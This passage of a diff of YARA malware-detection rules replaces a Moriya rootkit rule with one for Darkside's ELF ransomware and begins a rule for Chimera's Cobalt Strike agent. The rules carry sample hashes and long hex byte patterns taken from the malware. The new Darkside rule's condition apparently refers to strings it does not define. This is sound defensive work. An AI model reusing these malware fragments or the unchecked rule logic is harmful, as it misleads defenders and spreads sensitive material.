+		$s7 = { 41 73 73 65 6d 62 6c 79 2e 4c 6f 61 64 28 }
+		$s8 = { 20 69 66 20 6c 65 6e 28 73 79 73 2e 61 72 67 76 29 21 3d 32 3a }
+		$s9 = { 65 78 63 65 70 74 20 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 45 78 63 65 70 74 69 6f 6e 20 61 73 20 65 78 3a }
+		$s10 = { 69 66 20 5f 5f 6e 61 6d 65 5f 5f 3d 3d }
+		$s11 = { 2e 66 6f 72 6d 61 74 28 65 78 2e 4d 65 73 73 61 67 65 2c 65 78 2e 53 74 61 63 6b 54 72 61 63 65 29 29 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 200KB and 1 of ( $x* ) and 4 of ( $s* )
+		filesize > 100KB and 9 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Moriya_May_2021_2 : FILE
+rule ARKBIRD_SOLG_RAN_ELF_Darkside_Apr_2021_1 : FILE
 {
 	meta:
-		description = "Detect Moriya rootkit used in the TunnelSnake operation"
+		description = "Detect the ELF version of Darkside ransomware"
 		author = "Arkbird_SOLG"
-		id = "25cecff1-94f9-5e8d-8758-9b891e9d7373"
-		date = "2020-05-26"
-		modified = "2021-05-27"
-		reference = "https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-26/Moriya/MAL_Moriya_May_2021_2.yara#L1-L22"
+		id = "10c0ba57-d6d6-5d1d-bd2a-f6f240d71f8b"
+		date = "2021-05-01"
+		modified = "2021-05-02"
+		reference = "https://twitter.com/JAMESWT_MHT/status/1388301138437578757"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-01/Darkside/RAN_ELF_Darkside_Apr_2021_1.yara#L1-L23"
 		license_url = "N/A"
-		logic_hash = "11ef00940604c3337b1c8c00903297343cfd4e8f3899b949d58e4203ab68d3fd"
+		logic_hash = "510932893e1e81d6c88e86c7ae2345460b397c936336c7e1a33799dbc1dd6aab"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "ce21319bd21f76ab0f188a514e8ab1fe6f960c257475e45a23d11125d78df428"
+		hash1 = "984ce69083f2865ce90b48569291982e786980aeef83345953276adfcbbeece8"
+		hash2 = "9cc3c217e3790f3247a0c0d3d18d6917701571a8526159e942d0fffb848acffb"
+		hash3 = "c93e6237abf041bc2530ccb510dd016ef1cc6847d43bf023351dce2a96fdc33b"
 		tlp = "White"
-		adversary = "Chinese APT Group"
+		adversary = "-"
 
 	strings:
-		$seq1 = { 8b 35 c4 30 40 00 8d 45 dc 68 92 24 40 00 50 ff d6 68 cc 24 40 00 8d 45 e4 50 ff d6 68 58 42 40 00 57 57 6a 22 8d 45 dc 50 57 53 ff 15 5c 30 40 00 8b f0 85 f6 0f 88 0a ff ff ff a1 58 42 40 00 83 48 1c 04 8d 45 dc 50 8d 45 e4 50 ff 15 60 30 40 00 e8 b2 00 00 00 }
-		$seq2 = { 68 3c 24 40 00 50 ff 15 c4 30 40 00 8d 85 d8 fe ff ff 50 ff 15 bc 30 40 00 85 c0 74 1b 8d 8d e0 fe ff ff 51 ff d0 8b 8d e4 fe ff ff 8b 85 e8 fe ff ff 0f b7 5d f4 eb 28 53 8d 85 cc fe ff ff 50 8d 85 d4 fe ff ff 50 8d 85 d0 fe ff ff 50 ff 15 ac 30 40 00 8b 8d d0 fe ff ff 8b 85 d4 fe ff ff c1 e1 08 0f b6 c0 0b c1 0f b6 cb }
-		$seq3 = { 8b 75 c0 8d 45 cc 50 ff 15 94 30 40 00 8b 5d c8 8b 43 0c 8b 55 bc 89 42 20 8b 43 08 89 42 1c 80 62 03 0f 8a 43 10 24 0f 08 42 03 8b 4b 08 85 c9 74 30 80 7e 24 00 74 06 f6 43 10 20 75 17 8b 46 18 85 c0 78 0a f6 43 10 40 75 0a 85 c0 79 20 f6 43 10 80 74 1a ff 73 0c 56 ff 75 b4 ff d1 8b f8 eb 0d 80 7e 21 00 74 07 8b 46 60 80 48 03 01 68 74 6e 68 00 53 ff 15 b4 30 40 00 }
-		$seq4 = { 6a 79 68 78 6f 00 00 68 72 70 00 00 6a 69 68 73 6e 00 00 6a 5c 68 72 65 00 00 6a 76 68 69 72 00 00 68 44 5c 00 00 50 e8 a2 f8 ff ff 83 c4 30 8d 85 7c ff ff ff 50 8d 85 6c ff ff ff 50 ff 15 c4 30 40 00 a1 88 30 40 00 68 34 42 40 00 56 56 ff 30 8d 85 6c ff ff ff 56 56 6a 40 50 ff 15 90 30 40 00 }
-		$seq5 = { 55 8b ec 81 ec 28 01 00 00 a1 04 40 40 00 33 c5 89 45 fc 8b 45 08 53 8b 5d 10 56 8b 75 0c 57 89 85 e8 fe ff ff 8d 7d 88 8b 45 14 6a 07 89 85 e4 fe ff ff 33 c0 59 f3 ab 33 ff 89 b5 d8 fe ff ff 68 94 00 00 00 8d 85 f0 fe ff ff 89 bd ec fe ff ff 57 50 e8 48 03 00 00 6a 06 89 7d e0 33 c0 59 8d 7d e4 f3 ab 33 ff 8d 45 a8 6a 38 57 50 89 7d a4 e8 2a 03 00 00 89 bd dc fe ff ff 8d 45 84 89 bd e0 fe ff ff 83 c4 18 89 bd dc fe ff ff 89 bd e0 fe ff ff 8d 7d 84 a5 ff b5 e4 fe ff ff 50 a5 53 a5 a5 c7 45 98 68 1b }
-		$s1 = "\\Device\\MoriyaStreamWatchmen" fullword wide
-		$s2 = "Moriya Filter" fullword wide
-		$s3 = "Moriya Callout" fullword wide
-		$s4 = "\\DosDevices\\MoriyaStreamWatchmen" fullword wide
+		$seq1 = { 48 8d 3d d1 e8 3b 00 e8 9c 51 f2 ff 85 c0 74 c6 4c 8d 6c 24 10 4c 89 ef e8 ab bf 02 00 48 8d 1d 34 bb 37 00 49 8d 75 08 48 8d 3d 31 e1 3b 00 48 8d 43 10 48 89 05 1e e1 3b 00 e8 09 1e 02 00 48 8d 05 22 d8 0e 00 48 8b 7c 24 18 c7 05 4b e1 3b 00 01 00 00 00 48 89 05 1c e1 3b 00 48 8d 05 4d d8 0e 00 48 85 ff 48 89 05 13 e1 3b 00 48 8d 05 84 d8 0e 00 48 89 05 0d e1 3b 00 48 8d 05 be d8 0e 00 48 89 05 07 e1 3b 00 48 8d 05 48 d9 0e 00 48 89 05 01 e1 3b 00 48 8d 43 10 48 89 44 24 10 74 05 e8 21 45 f2 ff 4c 8d ac 24 30 03 00 00 4c 89 ef e8 11 bf 02 00 4c 8d b4 24 10 03 00 00 ba 03 00 00 00 4c 89 ee 4c 89 f7 e8 39 62 ff ff 48 8b bc 24 38 03 00 00 48 8d 43 10 48 89 84 24 30 03 00 00 48 85 ff 74 05 e8 db 44 f2 ff 4c 8d 6c 24 30 ba 01 00 00 00 4c 89 f6 4c 89 ef e8 06 62 ff ff 48 8b bc 24 18 03 00 00 48 8d 43 10 48 89 84 24 10 03 00 00 48 85 ff 74 05 e8 a8 44 f2 ff 48 8d 43 10 49 8d 75 08 48 8d 3d 81 e0 3b 00 48 89 05 72 e0 3b 00 e8 0d 1d 02 00 48 8d 05 26 d7 0e 00 48 8b 7c 24 38 c7 05 9f e0 3b 00 01 00 00 00 48 89 05 70 e0 3b 00 48 8d 05 51 d7 0e 00 48 85 ff 48 89 05 67 e0 3b 00 48 8d 05 88 d7 0e 00 48 89 05 61 e0 3b 00 48 8d 05 c2 d7 0e 00 48 89 05 5b e0 3b 00 48 8d 05 4c d8 0e 00 48 89 05 55 e0 3b 00 48 8d 43 10 48 89 44 24 30 74 05 e8 25 44 f2 ff 4c 8d b4 24 50 03 00 00 4c 89 f7 e8 05 c5 02 00 4c 8d 6c 24 50 ba 01 00 00 00 4c 89 f6 4c 89 ef e8 40 61 ff ff 48 8b bc 24 58 03 00 00 48 8d 43 10 48 89 84 24 50 03 00 00 48 85 ff 74 05 e8 e2 43 f2 ff 48 8d 43 10 49 8d 75 08 48 8d 3d 0b e0 3b 00 48 89 05 fc df 3b 00 e8 47 1c 02 00 48 8d 05 18 d8 0e 00 48 8b 7c 24 58 c7 05 29 e0 3b 00 01 00 00 00 48 89 05 fa df 3b 00 48 8d 05 33 d8 0e 00 48 85 ff 48 89 05 f1 df 3b 00 48 8d 05 5a d8 0e 00 48 89 05 eb df 3b 00 48 8d 05 84 d8 0e 00 48 89 05 e5 df 3b 00 48 8d 05 de d8 0e 00 48 89 05 df df 3b 00 48 8d 43 10 48 89 44 24 50 74 05 e8 5f 43 f2 ff 4c 8d b4 24 70 03 00 00 4c 89 f7 e8 3f c4 02 00 4c 8d 6c 24 70 ba 07 00 00 00 4c 89 f6 4c 89 ef e8 7a 60 ff ff 48 8b bc 24 78 03 00 00 48 8d 43 10 48 89 84 24 70 03 00 00 48 85 ff 74 05 e8 1c 43 f2 ff 48 8d 43 10 49 8d 75 08 48 8d 3d 95 df 3b 00 48 89 05 86 df 3b 00 e8 81 1b 02 00 48 8d 05 9a d8 0e 00 48 8b 7c 24 78 c7 05 b3 df 3b 00 01 00 00 00 48 89 05 84 df 3b 00 48 8d 05 c5 d8 0e 00 48 85 ff 48 89 05 7b df 3b 00 48 8d 05 fc d8 0e 00 48 89 05 75 df 3b 00 48 8d 05 36 d9 0e 00 48 89 05 6f df 3b 00 48 8d 05 b0 d9 0e 00 48 89 05 69 df 3b 00 48 8d 43 10 48 89 44 24 70 74 05 e8 99 42 f2 ff 4c 8d ac 24 90 03 00 00 4c 89 ef e8 19 be 02 00 4c 8d b4 24 b0 03 00 00 ba 01 00 00 00 4c 89 ee 4c 89 f7 e8 b1 5f ff ff 4c 8d ac 24 90 00 00 00 ba 01 00 00 00 4c 89 f6 4c 89 ef e8 99 5f ff ff 48 8b bc 24 b8 03 00 00 48 8d 43 10 48 89 84 24 b0 03 00 00 48 85 ff 74 05 e8 3b 42 f2 ff 48 8b bc 24 98 03 00 00 48 8d 43 10 48 89 84 24 90 03 00 00 48 85 ff 74 05 e8 1d 42 f2 ff 48 8d 43 10 49 8d 75 08 48 8d 3d e6 de 3b 00 48 89 05 d7 de 3b 00 e8 82 1a 02 00 48 8d 05 43 d9 0e 00 48 8b bc 24 98 00 00 00 c7 05 01 df 3b 00 01 00 00 00 48 89 05 d2 de 3b 00 48 8d 05 53 d9 0e 00 48 85 ff 48 89 05 c9 de 3b 00 48 8d 05 72 d9 0e 00 48 89 05 c3 de 3b 00 48 8d 05 94 d9 0e 00 48 89 05 bd de 3b 00 48 8d 05 de d9 0e 00 48 89 05 b7 de 3b 00 48 8d 43 10 48 89 84 24 90 00 00 00 74 05 e8 94 41 f2 ff 4c 8d ac 24 d0 03 00 00 4c 89 ef e8 14 bd 02 00 4c 8d b4 24 f0 03 00 00 ba 01 00 00 00 4c 89 ee 4c 89 f7 e8 ac 5e ff ff 4c 8d ac 24 b0 00 00 00 ba 03 00 00 00 4c 89 f6 4c 89 ef e8 94 5e ff ff 48 8b bc 24 f8 03 00 00 48 8d 43 10 48 89 84 24 f0 03 00 00 48 85 ff 74 05 e8 36 41 f2 ff 48 8b bc 24 d8 03 00 00 48 8d 43 10 48 89 84 24 d0 03 00 00 48 85 ff 74 05 e8 18 41 f2 ff 48 8d 43 10 49 8d 75 08 48 8d 3d 31 de 3b 00 48 89 05 22 de 3b 00 e8 7d 19 02 00 48 8d 05 56 d9 0e 00 48 8b bc 24 b8 00 00 00 c7 05 4c de 3b 00 01 00 00 00 48 89 05 1d de 3b 00 48 8d 05 6e d9 0e 00 48 85 ff 48 89 05 14 de 3b 00 48 8d 05 95 d9 0e 00 48 89 05 0e de 3b 00 48 8d 05 bf d9 0e 00 48 89 05 08 de 3b 00 48 8d 05 19 da 0e 00 48 89 05 02 de 3b 00 48 8d 43 10 48 89 84 24 b0 00 00 00 74 05 e8 8f 40 f2 ff 4c 8d ac 24 10 04 00 00 4c 89 ef e8 0f bc 02 00 4c 8d b4 24 30 04 00 00 ba 01 00 00 00 4c 89 ee 4c 89 f7 e8 a7 5d ff ff 4c 8d ac 24 d0 00 00 00 ba 05 00 00 00 4c 89 f6 4c 89 ef e8 8f 5d ff ff 48 8b bc 24 38 04 00 00 48 8d 43 10 48 89 84 24 30 04 00 00 48 85 ff 74 05 e8 31 40 f2 ff 48 8b bc 24 18 04 00 00 48 8d 43 10 48 89 84 24 10 04 00 00 48 85 ff 74 05 e8 13 40 f2 ff 48 8d 43 10 49 8d 75 08 48 8d 3d 7c dd 3b 00 48 89 05 6d dd 3b 00 e8 78 18 02 00 48 8d 05 99 d9 0e 00 48 8b bc 24 d8 00 00 00 c7 05 97 dd 3b 00 01 00 00 00 48 89 05 68 dd 3b 00 48 8d 05 b9 d9 0e 00 48 85 ff 48 89 05 5f dd 3b 00 48 8d 05 e8 d9 0e 00 48 89 05 59 dd 3b 00 48 8d 05 1a da 0e 00 48 89 05 53 dd 3b 00 48 8d 05 84 da 0e 00 48 89 05 4d dd 3b 00 48 8d 43 10 48 89 84 24 d0 00 00 00 74 05 e8 8a 3f f2 ff 4c 8d ac 24 50 04 00 00 4c 89 ef e8 0a bb 02 00 4c 8d b4 24 70 04 00 00 ba 01 00 00 00 4c 89 ee 4c 89 f7 e8 a2 5c ff ff 4c 8d ac 24 f0 00 00 00 ba 07 00 00 00 4c 89 f6 4c 89 ef e8 8a 5c ff ff 48 8b bc 24 78 04 00 00 48 8d 43 10 48 89 84 24 70 04 00 00 48 85 ff 74 05 e8 2c 3f f2 ff 48 8b bc 24 58 04 00 00 48 8d 43 10 48 89 84 24 50 04 00 00 48 85 ff 74 05 e8 0e 3f f2 ff 48 8d 43 10 49 8d 75 08 48 8d 3d c7 dc 3b 00 48 89 05 b8 dc 3b 00 e8 73 17 02 00 48 8d 05 0c da 0e 00 48 8b bc 24 f8 00 00 00 c7 05 e2 dc 3b 00 01 00 00 00 48 89 05 b3 dc 3b 00 48 8d 05 34 da 0e 00 48 85 ff 48 89 05 aa dc 3b 00 48 8d 05 6b da 0e 00 48 89 05 a4 dc 3b 00 48 8d 05 a5 da 0e 00 48 89 05 9e dc 3b 00 48 8d 05 1f db 0e 00 48 89 05 98 dc 3b 00 48 8d 43 10 48 89 84 24 f0 00 00 00 74 05 e8 85 3e f2 ff 4c 8d ac 24 90 04 00 00 4c 89 ef e8 05 ba 02 00 4c 8d b4 24 b0 04 00 00 ba 01 00 00 00 4c 89 ee 4c 89 f7 e8 9d 5b ff ff 4c 8d ac 24 10 01 00 00 ba 09 00 00 00 4c 89 f6 4c 89 ef e8 85 5b ff ff 48 8b bc 24 b8 04 00 00 48 8d 43 10 48 89 84 24 b0 04 00 00 48 85 ff 74 05 e8 27 3e f2 ff 48 8b bc 24 98 04 00 00 48 8d 43 10 48 89 84 24 90 04 00 00 48 85 ff 74 05 e8 09 3e f2 ff 48 8d 43 10 49 8d }
+		$seq2 = { 41 56 49 89 fe 41 55 41 89 cd 41 54 45 8d 60 01 55 53 44 89 c3 48 81 ec 98 06 00 00 41 39 cc 89 74 24 10 48 89 54 24 30 0f 84 ab 09 00 00 48 8d 84 24 80 00 00 00 41 8d 70 ff 48 8d ac 24 10 01 00 00 48 89 c7 48 89 44 24 48 e8 0f 89 f6 ff be 01 00 00 00 48 89 ef e8 02 51 f6 ff 4c 8d a4 24 e0 00 00 00 89 de 4c 89 e7 e8 f0 88 f6 ff 48 8d 84 24 b0 00 00 00 48 89 ea 4c 89 e6 48 89 c7 48 89 44 24 20 e8 55 8d f6 ff 48 8d 1d 4e a2 2f 00 49 8d 7c 24 08 4c 8d 7b 10 4c 89 bc 24 e0 00 00 00 e8 48 eb ea ff 48 8d 7d 08 4c 89 bc 24 10 01 00 00 e8 37 eb ea ff 48 8d 84 24 40 01 00 00 41 8d 75 ff 48 89 c7 48 89 44 24 38 e8 8e 88 f6 ff 48 8d 84 24 d0 01 00 00 be 01 00 00 00 48 89 c7 49 89 c7 48 89 44 24 50 e8 71 50 f6 ff 48 8d ac 24 a0 01 00 00 44 89 ee 48 89 ef e8 5e 88 f6 ff 48 8d 84 24 70 01 00 00 4c 89 fa 48 89 ee 48 89 c7 48 89 44 24 40 e8 c3 8c f6 ff 4c 8d 63 10 48 8d 7d 08 48 8d ac 24 00 02 00 00 4c 89 a4 24 a0 01 00 00 e8 b6 ea ea ff 4c 89 ff 4c 89 a4 24 d0 01 00 00 4c 8d a4 24 30 02 00 00 48 83 c7 08 e8 9a ea ea ff 4c 63 7c 24 10 49 8d 46 30 48 89 44 24 18 0f 1f 40 00 e8 b3 7c f6 ff 49 89 c5 e8 ab 75 f6 ff 4c 89 2c 24 4c 8b 6c 24 18 49 89 c1 48 8b 4c 24 20 48 8b 54 24 48 41 b8 01 00 00 00 48 8b 74 24 30 4c 89 ef e8 32 f9 f6 ff 4c 89 fe 48 89 ef e8 b7 4f f6 ff 4c 89 ea 48 89 ee 4c 89 e7 e8 09 d9 f6 ff 48 8b 4c 24 40 48 8b 54 24 38 4d 89 e1 48 8b 74 24 30 4c 89 2c 24 41 b8 01 00 00 00 4c 89 f7 e8 f5 f8 f6 ff 48 8b 94 24 50 02 00 00 48 8b 8c 24 40 02 00 00 41 89 c5 48 39 8c 24 48 02 00 00 48 8d 43 10 48 0f 46 8c 24 48 02 00 00 48 85 d2 48 89 84 24 30 02 00 00 74 10 48 89 d7 31 c0 f3 48 ab 48 89 d7 e8 40 4f f7 ff 48 8b 94 24 20 02 00 00 48 8b 8c 24 10 02 00 00 48 8d 43 10 48 39 8c 24 18 02 00 00 48 0f 46 8c 24 18 02 00 00 48 89 84 24 00 02 00 00 48 85 d2 74 10 48 89 d7 31 c0 f3 48 ab 48 89 d7 e8 fe 4e f7 ff 45 84 ed 0f 84 fd fe ff ff 83 7c 24 10 01 0f 84 bc 04 00 00 48 8d 84 24 e0 03 00 00 4c 8d ac 24 c0 05 00 00 48 89 44 24 10 48 8d 84 24 10 04 00 00 48 89 44 24 08 49 8d 45 08 }
+		$seq3 = { 4c 8d bc 24 00 05 00 00 be 01 00 00 00 4c 89 ff e8 9b 4e f6 ff 4c 8d a4 24 30 05 00 00 4c 89 fa 4c 89 f6 4c 89 e7 e8 05 88 f6 ff 48 8d ac 24 60 05 00 00 48 8b 54 24 18 4c 89 e6 48 89 ef e8 5d d3 f6 ff 48 8d 84 24 90 05 00 00 4c 89 f1 4c 89 ea 48 89 ee 48 89 c7 48 89 44 24 28 e8 ef b9 ff ff 48 8b 74 24 28 49 8d 7e 60 e8 01 59 f6 ff 48 8b 94 24 b0 05 00 00 48 8b 8c 24 a0 05 00 00 48 8d 43 10 48 39 8c 24 a8 05 00 00 48 0f 46 8c 24 a8 05 00 00 48 89 84 24 90 05 00 00 48 85 d2 74 10 48 89 d7 31 c0 f3 48 ab 48 89 d7 e8 ff 4d f7 ff 48 8b 94 24 80 05 00 00 48 8b 8c 24 70 05 00 00 48 8d 43 10 48 39 8c 24 78 05 00 00 48 0f 46 8c 24 78 05 00 00 48 89 84 24 60 05 00 00 48 85 d2 74 10 48 89 d7 31 c0 f3 48 ab 48 89 d7 e8 bd 4d f7 ff 48 8b 94 24 50 05 00 00 48 8b 8c 24 40 05 00 00 48 8d 43 10 48 39 8c 24 48 05 00 00 48 0f 46 8c 24 48 05 00 00 48 89 84 24 30 05 00 00 }
+		$seq4 = { 49 89 ff 41 56 49 89 f6 41 55 41 54 55 53 49 8d 9e c8 01 00 00 48 81 ec f8 05 00 00 48 8d bc 24 d0 00 00 00 e8 e5 52 00 00 48 8d bc 24 00 01 00 00 be 06 0e 5d 00 e8 33 99 ff ff 48 8d b4 24 00 01 00 00 48 8d bc 24 d0 00 00 00 48 89 da e8 bb eb ff ff 48 8b 84 24 00 01 00 00 48 8d b4 24 60 04 00 00 49 8d 9e c0 01 00 00 48 8d 78 e8 e8 9b 10 fd ff 48 8d bc 24 20 01 00 00 be 79 e3 5b 00 e8 e9 98 ff ff 48 8d b4 24 20 01 00 00 48 8d bc 24 d0 00 00 00 48 89 da e8 71 eb ff ff 48 8b 84 24 20 01 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 58 10 fd ff 48 8d 7c 24 20 4c 89 f6 e8 6b 9d ff ff 48 8d bc 24 40 01 00 00 be 14 e4 5b 00 e8 99 98 ff ff 48 8d 54 24 20 48 8d b4 24 40 01 00 00 48 8d bc 24 d0 00 00 00 e8 1f eb ff ff 48 8b 84 24 40 01 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 06 10 fd ff 48 8b 44 24 20 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 f0 0f fd ff 48 8d bc 24 60 01 00 00 be 1d e4 5b 00 e8 3e 98 ff ff 48 8d bc 24 c0 00 00 00 e8 41 22 fd ff 48 8d b4 24 c0 00 00 00 48 8d bc 24 60 04 00 00 e8 cc 0f fd ff 48 8d 8c 24 60 04 00 00 48 8d b4 24 60 01 00 00 48 8d bc 24 d0 00 00 00 ba 3f 26 5e 00 e8 fa ce 00 00 48 8d bc 24 60 04 00 00 e8 7d 19 fd ff 48 8d bc 24 c0 00 00 00 e8 70 19 fd ff 48 8b 84 24 60 01 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 67 0f fd ff 48 8d bc 24 80 01 00 00 be 90 e4 5b 00 e8 b5 97 ff ff 48 8d b4 24 80 01 00 00 48 8d bc 24 d0 00 00 00 ba 48 38 8a 00 e8 3b ea ff ff 48 8b 84 24 80 01 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 22 0f fd ff 48 8d 94 24 20 04 00 00 48 8d b4 24 00 04 00 00 4c 89 f7 48 c7 84 24 00 04 00 00 78 24 8a 00 48 c7 84 24 20 04 00 00 78 24 8a 00 e8 f2 9c ff ff 48 8d bc 24 a0 01 00 00 be 24 e4 5b 00 e8 40 97 ff ff 48 8d 94 24 00 04 00 00 48 8d b4 24 a0 01 00 00 48 8d bc 24 d0 00 00 00 e8 c3 e9 ff ff 48 8b 84 24 a0 01 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 aa 0e fd ff 48 8d bc 24 c0 01 00 00 be 2d e4 5b 00 e8 f8 96 ff ff 48 8d 94 24 20 04 00 00 48 8d b4 24 c0 01 00 00 48 8d bc 24 d0 00 00 00 e8 7b e9 ff ff 48 8b 84 24 c0 01 00 00 48 8d b4 24 60 04 00 00 48 8d ac 24 e0 03 00 00 48 8d 78 e8 e8 5a 0e fd ff c7 84 24 e0 03 00 00 00 00 00 00 48 89 ac 24 60 04 00 00 e8 e2 e4 fd ff 48 8d 94 24 60 04 00 00 48 8d bc 24 40 04 00 }
+		$seq5 = { e8 bb e4 fd ff 48 8d bc 24 40 04 00 00 48 89 84 24 e0 01 00 00 e8 b6 e9 05 00 48 89 c3 48 89 84 24 e8 01 00 00 e8 96 1d fd ff 8b 40 08 48 83 c3 08 be 33 e4 5b 00 48 89 df 89 84 24 f0 01 00 00 e8 7b e9 fd ff 48 8b b4 24 00 04 00 00 48 89 df 48 8b 56 e8 e8 67 e6 fd ff 48 8d bc 24 e0 01 00 00 e8 5a d9 fd ff 48 83 bc 24 40 04 00 00 00 75 8f c7 84 24 e0 03 00 00 00 00 00 00 48 89 ac 24 60 04 00 00 e8 37 e4 fd ff 48 8d 94 24 60 04 00 00 48 8d bc 24 40 04 00 00 48 89 c6 }
+		$seq6 = { 48 8d bc 24 40 04 00 00 48 89 84 24 00 02 00 00 e8 0e e9 05 00 48 89 c3 48 89 84 24 08 02 00 00 e8 ee 1c fd ff 8b 40 08 48 83 c3 08 be 3e e4 5b 00 48 89 df 89 84 24 10 02 00 00 e8 d3 e8 fd ff 48 8b b4 24 20 04 00 00 48 89 df 48 8b 56 e8 e8 bf e5 fd ff 48 8d bc 24 00 02 00 00 e8 b2 d8 fd ff 48 83 bc 24 40 04 00 00 00 75 8f 48 8b 84 24 20 04 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 ee 0c fd ff 48 8b 84 24 00 04 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 d5 0c fd ff e8 10 c9 fe ff 84 c0 0f 84 48 02 00 00 48 8d 74 24 1d c6 04 24 00 48 89 ef e8 07 97 00 00 48 8b bc 24 e0 03 00 00 48 8d b4 24 00 04 00 00 48 c7 84 24 00 04 00 00 00 00 00 00 48 c7 84 24 08 04 00 00 00 00 00 00 48 c7 84 24 10 04 00 00 00 00 00 00 e8 3e db fe ff 84 c0 0f 84 c9 00 00 00 48 8b 84 24 08 04 00 00 48 2b 84 24 00 04 00 00 48 c1 f8 03 }
+		$seq7 = { 48 83 bc 24 40 04 00 00 00 75 95 48 8d bc 24 00 04 00 00 e8 b0 9e fe ff 48 8b bc 24 e8 03 00 00 48 85 ff 74 05 e8 0e 66 ff ff 48 8d bc 24 f0 00 00 00 e8 81 4d 00 00 48 8d b4 24 f0 00 00 00 4c 89 f7 e8 81 f0 ff ff 48 8d bc 24 40 04 00 00 be 02 e5 5b 00 e8 bf 93 ff ff 48 8d 94 24 f0 00 00 00 48 8d b4 24 40 04 00 00 48 8d bc 24 d0 00 00 00 e8 f2 d1 00 00 48 8b 84 24 40 04 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 29 0b fd ff 48 8d bc 24 60 04 00 00 be 18 00 00 00 e8 07 0e fd ff 48 8d bc 24 70 04 00 00 48 8d b4 24 d0 00 00 00 ba 01 00 00 00 e8 5d ad 00 00 48 8d b4 24 78 04 00 00 48 8d bc 24 b0 00 00 00 e8 38 0c fd ff 48 8d 94 24 b0 00 00 00 4c 89 f6 4c 89 ff e8 e5 c6 ff ff 48 8b 84 24 b0 00 00 00 48 8d b4 24 40 04 00 00 48 8d 78 e8 e8 bc 0a fd ff 48 8d bc 24 60 04 00 00 e8 cf 16 fd ff 48 8d bc 24 f0 00 00 00 e8 52 4d 00 00 48 8d bc 24 d0 00 00 00 e8 45 4d 00 00 48 81 c4 f8 05 00 00 4c 89 f8 5b 5d 41 5c 41 5d }
+		$seq8 = { 4c 8d a4 24 64 05 00 00 66 0f 1f 44 00 00 e8 23 de fd ff 48 8d 94 24 20 04 00 00 48 8d bc 24 a0 03 00 00 48 89 c6 e8 eb df fd ff 48 8b 9c 24 a8 03 00 00 be f7 e4 5b 00 48 8d 7b 08 e8 f5 e2 fd ff 48 8d 7b 70 4c 89 e6 e8 d9 0b fd ff 48 8d bc 24 a0 03 00 00 e8 dc d2 fd ff 48 83 bc 24 20 04 00 00 00 75 a9 48 8d 84 24 c0 03 00 00 be 6c e4 5b 00 48 89 c7 48 89 44 24 08 e8 77 8f ff ff 48 8b 5c 24 08 48 8d 94 24 60 04 00 00 48 8d bc 24 d0 00 00 00 48 89 de e8 7a c8 00 00 48 8b 84 24 c0 03 00 00 48 8d b4 24 40 04 00 00 48 8d 78 e8 e8 e1 06 fd ff 48 8d b4 24 23 05 00 00 48 8d bc 24 a0 00 00 00 48 89 da e8 29 0d fd ff 48 8d 94 24 a0 03 00 00 48 8d b4 24 60 04 00 00 48 8d bc 24 90 00 00 00 e8 0c 0d fd ff 48 8d bc 24 90 00 00 00 be 90 d6 5c 00 e8 ba 16 fd ff 48 8b 10 48 89 94 24 20 04 00 00 48 c7 00 78 24 8a 00 48 8b 94 24 20 04 00 00 48 8b 84 24 a0 00 00 00 48 8b 4a e8 48 89 ce 48 03 70 e8 48 3b 72 f0 76 0a 48 3b 70 f0 0f 86 b7 08 00 00 48 8d b4 24 a0 00 00 00 48 8d bc 24 20 04 00 00 e8 08 0c fd ff 48 8b 10 be 8d e4 5b 00 48 89 ef 48 89 94 24 40 04 00 00 48 c7 00 78 24 8a 00 e8 89 8e ff ff 48 8d 94 24 40 04 00 00 48 8d bc 24 d0 00 00 00 48 89 ee e8 11 e1 ff ff 48 8b 84 24 e0 03 00 00 48 8d b4 24 00 04 00 00 48 8d 78 e8 e8 f8 05 fd ff 48 8b 84 24 40 04 00 00 48 8d b4 24 00 04 00 00 48 8d 78 e8 e8 df 05 fd ff 48 8b 84 24 20 04 00 00 48 8d b4 24 40 04 00 00 48 8d 78 e8 e8 c6 05 fd ff 48 8b 84 24 90 00 00 00 48 8d b4 24 40 04 00 00 48 8d 78 e8 e8 ad 05 fd ff 48 8b 84 24 a0 00 00 00 48 8d b4 24 40 04 00 00 48 8d 78 e8 e8 94 05 fd ff 48 8d bc 24 00 04 00 00 be 4c e4 5b 00 e8 e2 8d ff ff 48 8d 94 24 e2 04 00 00 48 8d b4 24 00 04 00 00 48 8d bc 24 d0 00 00 00 e8 e5 c6 00 00 48 8b 84 24 00 04 00 00 48 8d b4 24 40 04 00 00 48 8d 78 e8 e8 4c 05 fd ff 48 8d bc 24 20 04 00 00 be 98 e4 5b 00 e8 9a 8d ff ff 48 8d 94 24 64 05 00 00 48 8d b4 24 20 04 00 00 48 8d bc 24 d0 00 00 00 e8 9d c6 00 00 48 8b 84 24 20 04 00 00 48 8d b4 24 40 04 00 00 48 8d 78 e8 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 6KB and ( 3 of ( $seq* ) or 2 of ( $s* ) )
+		uint32( 0 ) == 0x464c457f and filesize > 300KB and 7 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Moriya_May_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_Chimera_Sept_2020_1 : FILE
 {
 	meta:
-		description = "Detect Moriya rootkit used in the TunnelSnake operation"
+		description = "Detect Cobalt Strike agent used by Chimera"
 		author = "Arkbird_SOLG"
-		id = "6a78ddc0-b39f-5aec-9c54-980854173abf"
-		date = "2020-05-07"
-		modified = "2021-05-26"
-		reference = "https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831/"
